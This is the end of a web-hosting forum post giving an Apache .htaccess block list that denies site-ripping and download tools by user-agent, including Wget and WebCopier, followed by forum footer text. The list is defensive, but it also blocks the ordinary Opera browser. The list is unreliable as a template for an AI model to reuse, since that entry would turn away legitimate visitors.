SetEnvIfNoCase user-agent "^Net\ Vampire" bad_bot
SetEnvIfNoCase user-agent "^NetZIP" bad_bot
SetEnvIfNoCase user-agent "^Octopus" bad_bot
SetEnvIfNoCase user-agent "^Offline\ Explorer" bad_bot
SetEnvIfNoCase user-agent "^Offline\ Navigator" bad_bot
SetEnvIfNoCase user-agent "^Opera" bad_bot
SetEnvIfNoCase user-agent "^PageGrabber" bad_bot
SetEnvIfNoCase user-agent "^Papa\ Foto" bad_bot
SetEnvIfNoCase user-agent "^pavuk" bad_bot
SetEnvIfNoCase user-agent "^pcBrowser" bad_bot
SetEnvIfNoCase user-agent "^RealDownload" bad_bot
SetEnvIfNoCase user-agent "^ReGet" bad_bot
SetEnvIfNoCase user-agent "^SiteSnagger" bad_bot
SetEnvIfNoCase user-agent "^SmartDownload" bad_bot
SetEnvIfNoCase user-agent "^SuperBot" bad_bot
SetEnvIfNoCase user-agent "^SuperHTTP" bad_bot
SetEnvIfNoCase user-agent "^Surfbot" bad_bot
SetEnvIfNoCase user-agent "^tAkeOut" bad_bot
SetEnvIfNoCase user-agent "^Teleport\ Pro" bad_bot
SetEnvIfNoCase user-agent "^VoidEYE" bad_bot
SetEnvIfNoCase user-agent "^Web\ Image\ Collector" bad_bot
SetEnvIfNoCase user-agent "^Web\ Sucker" bad_bot
SetEnvIfNoCase user-agent "^WebAuto" bad_bot
SetEnvIfNoCase user-agent "^WebCopier" bad_bot
SetEnvIfNoCase user-agent "^WebFetch" bad_bot
SetEnvIfNoCase user-agent "^WebGo\ IS" bad_bot
SetEnvIfNoCase user-agent "^WebLeacher" bad_bot
SetEnvIfNoCase user-agent "^WebReaper" bad_bot
SetEnvIfNoCase user-agent "^WebSauger" bad_bot
SetEnvIfNoCase user-agent "^Website\ eXtractor" bad_bot
SetEnvIfNoCase user-agent "^Website\ Quester" bad_bot
SetEnvIfNoCase user-agent "^WebStripper" bad_bot
SetEnvIfNoCase user-agent "^WebWhacker" bad_bot
SetEnvIfNoCase user-agent "^WebZIP" bad_bot
SetEnvIfNoCase user-agent "^Wget" bad_bot
SetEnvIfNoCase user-agent "^wget" bad_bot
SetEnvIfNoCase user-agent "^Widow" bad_bot
SetEnvIfNoCase user-agent "^WWWOFFLE" bad_bot
SetEnvIfNoCase user-agent "^Xaldon\ WebSpider" bad_bot
SetEnvIfNoCase user-agent "^Zeus" bad_bot

Order Allow,Deny
Allow from All
Deny from env=bad_bot
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - Other

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©